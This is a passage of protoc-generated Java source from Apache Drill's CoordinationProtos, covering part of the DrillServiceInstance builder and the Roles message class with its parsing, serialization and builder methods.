if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
id_ = value;
onChanged();
return this;
}
/**
* <code>optional string id = 1;</code>
* @return This builder for chaining.
*/
public Builder clearId() {
bitField0_ = (bitField0_ & ~0x00000001);
id_ = getDefaultInstance().getId();
onChanged();
return this;
}
/**
* <code>optional string id = 1;</code>
* @param value The bytes for id to set.
* @return This builder for chaining.
*/
public Builder setIdBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
id_ = value;
onChanged();
return this;
}
private long registrationTimeUTC_ ;
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
public boolean hasRegistrationTimeUTC() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
public long getRegistrationTimeUTC() {
return registrationTimeUTC_;
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @param value The registrationTimeUTC to set.
* @return This builder for chaining.
*/
public Builder setRegistrationTimeUTC(long value) {
bitField0_ |= 0x00000002;
registrationTimeUTC_ = value;
onChanged();
return this;
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return This builder for chaining.
*/
public Builder clearRegistrationTimeUTC() {
bitField0_ = (bitField0_ & ~0x00000002);
registrationTimeUTC_ = 0L;
onChanged();
return this;
}
private org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint endpoint_;
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder> endpointBuilder_;
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
public boolean hasEndpoint() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint() {
if (endpointBuilder_ == null) {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
} else {
return endpointBuilder_.getMessage();
}
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder setEndpoint(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint value) {
if (endpointBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
endpoint_ = value;
onChanged();
} else {
endpointBuilder_.setMessage(value);
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder setEndpoint(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder builderForValue) {
if (endpointBuilder_ == null) {
endpoint_ = builderForValue.build();
onChanged();
} else {
endpointBuilder_.setMessage(builderForValue.build());
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder mergeEndpoint(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint value) {
if (endpointBuilder_ == null) {
if (((bitField0_ & 0x00000004) != 0) &&
endpoint_ != null &&
endpoint_ != org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance()) {
endpoint_ =
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.newBuilder(endpoint_).mergeFrom(value).buildPartial();
} else {
endpoint_ = value;
}
onChanged();
} else {
endpointBuilder_.mergeFrom(value);
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder clearEndpoint() {
if (endpointBuilder_ == null) {
endpoint_ = null;
onChanged();
} else {
endpointBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder getEndpointBuilder() {
bitField0_ |= 0x00000004;
onChanged();
return getEndpointFieldBuilder().getBuilder();
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder() {
if (endpointBuilder_ != null) {
return endpointBuilder_.getMessageOrBuilder();
} else {
return endpoint_ == null ?
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder>
getEndpointFieldBuilder() {
if (endpointBuilder_ == null) {
endpointBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder>(
getEndpoint(),
getParentForChildren(),
isClean());
endpoint_ = null;
}
return endpointBuilder_;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.DrillServiceInstance)
}
// @@protoc_insertion_point(class_scope:exec.DrillServiceInstance)
private static final org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance();
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstance() {
return DEFAULT_INSTANCE;
}
@java.lang.Deprecated public static final com.google.protobuf.Parser<DrillServiceInstance>
PARSER = new com.google.protobuf.AbstractParser<DrillServiceInstance>() {
@java.lang.Override
public DrillServiceInstance parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DrillServiceInstance(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DrillServiceInstance> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DrillServiceInstance> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
public interface RolesOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.Roles)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
boolean hasSqlQuery();
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
boolean getSqlQuery();
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
boolean hasLogicalPlan();
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
boolean getLogicalPlan();
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
boolean hasPhysicalPlan();
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
boolean getPhysicalPlan();
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
boolean hasJavaExecutor();
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
boolean getJavaExecutor();
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
boolean hasDistributedCache();
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
boolean getDistributedCache();
}
/**
* Protobuf type {@code exec.Roles}
*/
public static final class Roles extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.Roles)
RolesOrBuilder {
private static final long serialVersionUID = 0L;
// Use Roles.newBuilder() to construct.
private Roles(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private Roles() {
sqlQuery_ = true;
logicalPlan_ = true;
physicalPlan_ = true;
javaExecutor_ = true;
distributedCache_ = true;
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new Roles();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private Roles(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 8: {
bitField0_ |= 0x00000001;
sqlQuery_ = input.readBool();
break;
}
case 16: {
bitField0_ |= 0x00000002;
logicalPlan_ = input.readBool();
break;
}
case 24: {
bitField0_ |= 0x00000004;
physicalPlan_ = input.readBool();
break;
}
case 32: {
bitField0_ |= 0x00000008;
javaExecutor_ = input.readBool();
break;
}
case 40: {
bitField0_ |= 0x00000010;
distributedCache_ = input.readBool();
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.Roles.class, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder.class);
}
private int bitField0_;
public static final int SQL_QUERY_FIELD_NUMBER = 1;
private boolean sqlQuery_;
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
public boolean hasSqlQuery() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
public boolean getSqlQuery() {
return sqlQuery_;
}
public static final int LOGICAL_PLAN_FIELD_NUMBER = 2;
private boolean logicalPlan_;
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
public boolean hasLogicalPlan() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
public boolean getLogicalPlan() {
return logicalPlan_;
}
public static final int PHYSICAL_PLAN_FIELD_NUMBER = 3;
private boolean physicalPlan_;
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
public boolean hasPhysicalPlan() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
public boolean getPhysicalPlan() {
return physicalPlan_;
}
public static final int JAVA_EXECUTOR_FIELD_NUMBER = 4;
private boolean javaExecutor_;
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
public boolean hasJavaExecutor() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
public boolean getJavaExecutor() {
return javaExecutor_;
}
public static final int DISTRIBUTED_CACHE_FIELD_NUMBER = 5;
private boolean distributedCache_;
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
public boolean hasDistributedCache() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
public boolean getDistributedCache() {
return distributedCache_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
output.writeBool(1, sqlQuery_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeBool(2, logicalPlan_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeBool(3, physicalPlan_);
}
if (((bitField0_ & 0x00000008) != 0)) {
output.writeBool(4, javaExecutor_);
}
if (((bitField0_ & 0x00000010) != 0)) {
output.writeBool(5, distributedCache_);
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(1, sqlQuery_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(2, logicalPlan_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(3, physicalPlan_);
}
if (((bitField0_ & 0x00000008) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(4, javaExecutor_);
}
if (((bitField0_ & 0x00000010) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(5, distributedCache_);
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.Roles)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.Roles other = (org.apache.drill.exec.proto.CoordinationProtos.Roles) obj;
if (hasSqlQuery() != other.hasSqlQuery()) return false;
if (hasSqlQuery()) {
if (getSqlQuery()
!= other.getSqlQuery()) return false;
}
if (hasLogicalPlan() != other.hasLogicalPlan()) return false;
if (hasLogicalPlan()) {
if (getLogicalPlan()
!= other.getLogicalPlan()) return false;
}
if (hasPhysicalPlan() != other.hasPhysicalPlan()) return false;
if (hasPhysicalPlan()) {
if (getPhysicalPlan()
!= other.getPhysicalPlan()) return false;
}
if (hasJavaExecutor() != other.hasJavaExecutor()) return false;
if (hasJavaExecutor()) {
if (getJavaExecutor()
!= other.getJavaExecutor()) return false;
}
if (hasDistributedCache() != other.hasDistributedCache()) return false;
if (hasDistributedCache()) {
if (getDistributedCache()
!= other.getDistributedCache()) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasSqlQuery()) {
hash = (37 * hash) + SQL_QUERY_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getSqlQuery());
}
if (hasLogicalPlan()) {
hash = (37 * hash) + LOGICAL_PLAN_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getLogicalPlan());
}
if (hasPhysicalPlan()) {
hash = (37 * hash) + PHYSICAL_PLAN_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getPhysicalPlan());
}
if (hasJavaExecutor()) {
hash = (37 * hash) + JAVA_EXECUTOR_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getJavaExecutor());
}
if (hasDistributedCache()) {
hash = (37 * hash) + DISTRIBUTED_CACHE_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getDistributedCache());
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.Roles prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code exec.Roles}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.Roles)
org.apache.drill.exec.proto.CoordinationProtos.RolesOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.Roles.class, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.Roles.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
}
}
@java.lang.Override
public Builder clear() {
super.clear();
sqlQuery_ = true;
bitField0_ = (bitField0_ & ~0x00000001);
logicalPlan_ = true;
bitField0_ = (bitField0_ & ~0x00000002);
physicalPlan_ = true;
bitField0_ = (bitField0_ & ~0x00000004);
javaExecutor_ = true;
bitField0_ = (bitField0_ & ~0x00000008);
distributedCache_ = true;
bitField0_ = (bitField0_ & ~0x00000010);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles build() {
org.apache.drill.exec.proto.CoordinationProtos.Roles result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.Roles result = new org.apache.drill.exec.proto.CoordinationProtos.Roles(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.sqlQuery_ = sqlQuery_;
if (((from_bitField0_ & 0x00000002) != 0)) {
to_bitField0_ |= 0x00000002;
}
result.logicalPlan_ = logicalPlan_;
if (((from_bitField0_ & 0x00000004) != 0)) {
to_bitField0_ |= 0x00000004;
}
result.physicalPlan_ = physicalPlan_;
if (((from_bitField0_ & 0x00000008) != 0)) {
to_bitField0_ |= 0x00000008;
}
result.javaExecutor_ = javaExecutor_;
if (((from_bitField0_ & 0x00000010) != 0)) {
to_bitField0_ |= 0x00000010;
}
result.distributedCache_ = distributedCache_;
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.Roles) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.Roles)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.Roles other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.Roles.getDefaultInstance()) return this;
if (other.hasSqlQuery()) {
setSqlQuery(other.getSqlQuery());
}
if (other.hasLogicalPlan()) {
setLogicalPlan(other.getLogicalPlan());
}
if (other.hasPhysicalPlan()) {
setPhysicalPlan(other.getPhysicalPlan());
}
if (other.hasJavaExecutor()) {
setJavaExecutor(other.getJavaExecutor());
}
if (other.hasDistributedCache()) {
setDistributedCache(other.getDistributedCache());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.Roles parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.Roles) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private boolean sqlQuery_ = true;
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
public boolean hasSqlQuery() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
public boolean getSqlQuery() {
return sqlQuery_;
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @param value The sqlQuery to set.
* @return This builder for chaining.
*/
public Builder setSqlQuery(boolean value) {
bitField0_ |= 0x00000001;
sqlQuery_ = value;
onChanged();
return this;
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearSqlQuery() {
bitField0_ = (bitField0_ & ~0x00000001);
sqlQuery_ = true;
onChanged();
return this;
}
private boolean logicalPlan_ = true;
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
public boolean hasLogicalPlan() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
public boolean getLogicalPlan() {
return logicalPlan_;
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @param value The logicalPlan to set.
* @return This builder for chaining.
*/
public Builder setLogicalPlan(boolean value) {
bitField0_ |= 0x00000002;
logicalPlan_ = value;
onChanged();
return this;
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearLogicalPlan() {
bitField0_ = (bitField0_ & ~0x00000002);
logicalPlan_ = true;
onChanged();
return this;
}
private boolean physicalPlan_ = true;
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
public boolean hasPhysicalPlan() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
public boolean getPhysicalPlan() {
return physicalPlan_;
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @param value The physicalPlan to set.
* @return This builder for chaining.
*/
public Builder setPhysicalPlan(boolean value) {
bitField0_ |= 0x00000004;
physicalPlan_ = value;
onChanged();
return this;
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearPhysicalPlan() {
bitField0_ = (bitField0_ & ~0x00000004);
physicalPlan_ = true;
onChanged();
return this;
}
private boolean javaExecutor_ = true;
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
public boolean hasJavaExecutor() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
public boolean getJavaExecutor() {
return javaExecutor_;
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @param value The javaExecutor to set.
* @return This builder for chaining.
*/
public Builder setJavaExecutor(boolean value) {
bitField0_ |= 0x00000008;
javaExecutor_ = value;
onChanged();
return this;
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearJavaExecutor() {
bitField0_ = (bitField0_ & ~0x00000008);
javaExecutor_ = true;
onChanged();
return this;
}
private boolean distributedCache_ = true;
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
public boolean hasDistributedCache() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
public boolean getDistributedCache() {
return distributedCache_;
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @param value The distributedCache to set.
* @return This builder for chaining.
*/
public Builder setDistributedCache(boolean value) {
bitField0_ |= 0x00000010;
distributedCache_ = value;
onChanged();
return this;
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return This builder for chaining.
*/
public Builder clearDistributedCache() {
bitField0_ = (bitField0_ & ~0x00000010);
distributedCache_ = true;
onChanged();
return this;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.Roles)
}
// @@protoc_insertion_point(class_scope:exec.Roles)
